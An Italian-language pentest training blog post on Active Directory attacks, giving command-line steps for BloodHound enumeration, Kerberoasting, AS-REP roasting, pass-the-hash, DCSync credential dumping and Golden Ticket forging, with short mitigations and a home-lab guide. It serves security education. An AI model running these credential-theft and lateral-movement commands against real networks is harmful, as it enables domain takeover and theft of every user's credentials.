Attacchi Active Directory 2026: Kerberoasting, BloodHound, Pass-the-Hash
7 settembre 2026 · di Pentevo
Active Directory (AD) è il sistema di autenticazione e autorizzazione usato dalla grande maggioranza delle aziende italiane con più di 50 dipendenti. Compromettere AD significa ottenere controllo completo sulla rete aziendale — motivo per cui gli attacchi AD sono al centro di ogni penetration test aziendale serio e di certificazioni come OSCP e CRTO.
Architettura Active Directory: concetti chiave
Prima degli attacchi, è essenziale capire il modello:
- Domain Controller (DC): Server che gestisce l'autenticazione Kerberos e il database LDAP di tutti gli oggetti del dominio
- Kerberos: Protocollo di autenticazione di AD. Usa ticket cifrati (TGT e TGS) invece di password in chiaro
- LDAP: Protocollo per interrogare il database AD — utenti, gruppi, GPO, computer
- SPN (Service Principal Name): Identifica un servizio nel dominio. Fondamentale per Kerberoasting
- ACL/ACE: Permessi sugli oggetti AD. Spesso mal configurati → vettori di privilege escalation
Fase 1: Enumerazione AD
Prima di attaccare, bisogna capire la struttura del dominio.
Con BloodHound
BloodHound visualizza graficamente i percorsi di attacco nel dominio AD. È lo strumento più potente per identificare rapidamente il percorso verso Domain Admin.
# Su Kali: lancia BloodHound + Neo4j
sudo neo4j start
bloodhound &
# Raccolta dati con SharpHound (su Windows nel dominio):
.\SharpHound.exe -c All --zipfilename bloodhound_data.zip
# Oppure con bloodhound-python (da Kali, se hai credenziali):
bloodhound-python -u utente -p password -ns <DC_IP> -d dominio.local -c All
Query utili in BloodHound:
- "Find all Domain Admins"
- "Shortest Paths to Domain Admins"
- "Find Principals with DCSync Rights"
Con Impacket
# Enumerazione LDAP
python3 /opt/impacket/examples/GetADUsers.py -all dominio.local/utente:password
# Elenca gli utenti con SPN (per Kerberoasting)
python3 /opt/impacket/examples/GetUserSPNs.py dominio.local/utente:password
Con CrackMapExec
# Enumerazione base
crackmapexec smb <CIDR> -u utente -p password
crackmapexec smb <DC_IP> -u utente -p password --users
crackmapexec smb <DC_IP> -u utente -p password --groups
Attacco 1: Kerberoasting
Requisiti: Un account utente nel dominio (qualsiasi privilegio)
Kerberoasting sfrutta il fatto che i ticket Kerberos per account di servizio (Service Principal Name) sono cifrati con la password dell'account di servizio. Se la password è debole, si crackca offline.
# Con Impacket:
python3 GetUserSPNs.py dominio.local/utente:password -dc-ip <DC_IP> -request
# Output: ticket in formato Hashcat
$krb5tgs$23$*...HASH...*
# Cracking con Hashcat:
hashcat -m 13100 ticket.txt /usr/share/wordlists/rockyou.txt
Mitigazione: Usare Managed Service Accounts (gMSA) con password complesse (>25 caratteri) e rotazione automatica.
Attacco 2: AS-REP Roasting
Requisiti: Nessuna autenticazione (per account con "Do not require Kerberos preauthentication")
python3 GetNPUsers.py dominio.local/ -usersfile users.txt -no-pass -dc-ip <DC_IP>
# Cracking:
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
Attacco 3: Pass-the-Hash (PtH)
Requisiti: Hash NTLM di un account (ottenuto da SAM, LSASS, o database AD)
Con il Pass-the-Hash non serve craccare la password — si usa direttamente l'hash NTLM per autenticarsi.
# Con CrackMapExec:
crackmapexec smb <IP> -u Administrator -H <NTLM_HASH>
crackmapexec smb <CIDR> -u Administrator -H <NTLM_HASH> --local-auth
# Con Impacket PSExec:
python3 psexec.py -hashes :<NTLM_HASH> Administrator@<IP>
# Con Evil-WinRM (per WinRM/port 5985):
evil-winrm -i <IP> -u Administrator -H <NTLM_HASH>
Come ottenere gli hash NTLM:
# Da LSASS (richiede SYSTEM): secretsdump.py
python3 secretsdump.py dominio.local/Administrator:password@<DC_IP>
python3 secretsdump.py -hashes :<hash> dominio.local/Administrator@<DC_IP>
Attacco 4: DCSync
Requisiti: Diritti "Replication" sul dominio (tipicamente Domain Admin o account con diritti delegati)
DCSync simula il comportamento di un Domain Controller che richiede la replica delle credenziali — senza bisogno di accedere fisicamente al DC.
python3 secretsdump.py -just-dc-ntlm dominio.local/Administrator:password@<DC_IP>
# Restituisce tutti gli hash NTLM del dominio, incluso krbtgt
Attacco 5: Golden Ticket
Requisiti: Hash NTLM dell'account krbtgt (ottenuto dopo DCSync o compromissione del DC)
Un Golden Ticket è un Ticket Granting Ticket (TGT) Kerberos falsificato che permette di autenticarsi come qualsiasi utente nel dominio — incluso un Domain Admin che non esiste — per 10 anni.
# Con Impacket ticketer.py:
python3 ticketer.py -nthash <KRBTGT_HASH> -domain-sid <DOMAIN_SID> -domain dominio.local Amministratore
# Usa il ticket:
export KRB5CCNAME=Amministratore.ccache
python3 psexec.py -k -no-pass dominio.local/Amministratore@<DC_IP>
Il Golden Ticket sopravvive ai cambi di password degli utenti — l'unico modo per invalidarlo è cambiare la password di krbtgt due volte.
Strumenti essenziali per AD pentesting
| Strumento | Linguaggio | Uso principale |
|---|---|---|
| Impacket | Python | Suite completa: secretsdump, psexec, GetSPNs, ticketer |
| BloodHound + SharpHound | .NET / JS | Visualizzazione percorsi di attacco AD |
| CrackMapExec (CME) | Python | Enumerazione e post-exploitation di massa |
| Rubeus | C# | Kerberos attacks (Kerberoasting, AS-REP, S4U) |
| Mimikatz | C | Dump credenziali LSASS, Golden/Silver ticket |
| Evil-WinRM | Ruby | Shell su WinRM con hash o password |
| Kerbrute | Go | Enumerazione utenti validi via Kerberos |
Laboratorio AD in casa
Per praticare questi attacchi legalmente, costruisci un laboratorio home lab con:
- VM1: Windows Server 2022 come Domain Controller
- VM2: Windows 10/11 joined al dominio (workstation vittima)
- VM3: Kali Linux (attaccante)
- Rete: VirtualBox Internal Network o Host-Only
Configura utenti con SPN, password deboli, e diritti mal configurati per simulare un ambiente reale.
Gli attacchi AD sono centrali per OSCP e ancora di più per CRTO (Certified Red Team Operator). Approfondisci la teoria con i corsi Pentevo Academy.
Domande frequenti
Perché Active Directory è importante nel penetration testing?
Il 90% delle reti aziendali italiane medio-grandi usa Active Directory per gestire utenti, computer e permessi. Comprometterne il Domain Controller equivale a compromettere l'intera organizzazione. Gli attacchi AD sono centrali in OSCP, nei red team engagement e in quasi ogni pentest aziendale reale.
Cosa serve per iniziare con gli attacchi AD?
Un laboratorio con almeno un Domain Controller Windows Server e una o due workstation Windows. VirtualBox è sufficiente. La suite Impacket (Python) e BloodHound sono i principali strumenti. Kali Linux include la maggior parte degli strumenti necessari.
Il Kerberoasting richiede credenziali AD?
Sì, Kerberoasting richiede di essere autenticato nel dominio (anche con un utente a basso privilegio). L'attacco richiede credenziali valide per richiedere ticket Kerberos — non funziona da utenti non autenticati. È un attacco post-compromise, non un vettore iniziale.
BloodHound è legale da usare in un penetration test?
Sì, se incluso nell'autorizzazione del pentest. BloodHound è uno strumento di analisi, non esegue attacchi diretti — raccoglie informazioni sulle relazioni nel dominio AD e le visualizza graficamente. Il suo uso richiede l'autorizzazione esplicita del cliente nel scope del test.
Letture correlate
Password Cracking 2026: Hashcat, John the Ripper e Wordlist per Pentester
Guida completa al password cracking per penetration testing: Hashcat e John the Ripper spiegati, tipi di hash, wordlist e regole — solo per uso autorizzato.
ToolsPrivilege Escalation: Guida Completa Linux e Windows 2026
Guida completa al privilege escalation in italiano: tecniche su Linux e Windows, strumenti LinPEAS e WinPEAS, GTFOBins e preparazione OSCP.
ToolsMigliori Tool AI per Penetration Testing 2026: Guida Completa
I migliori strumenti AI per il penetration testing nel 2026: confronto per funzionalità, prezzi, casi d'uso. Da Pentevo a Intruder, tutti valutati.
ToolsI Migliori Tool per l'Ethical Hacking nel 2026: La Lista Completa
I migliori strumenti per l'ethical hacking nel 2026: Kali Linux, Metasploit, Burp Suite, Nmap e molto altro. Guida pratica per principianti e professionisti.
Metti in pratica questi concetti
Pentevo Academy trasforma questi concetti in lezioni guidate, video e quiz — gratis.
Inizia a imparare gratis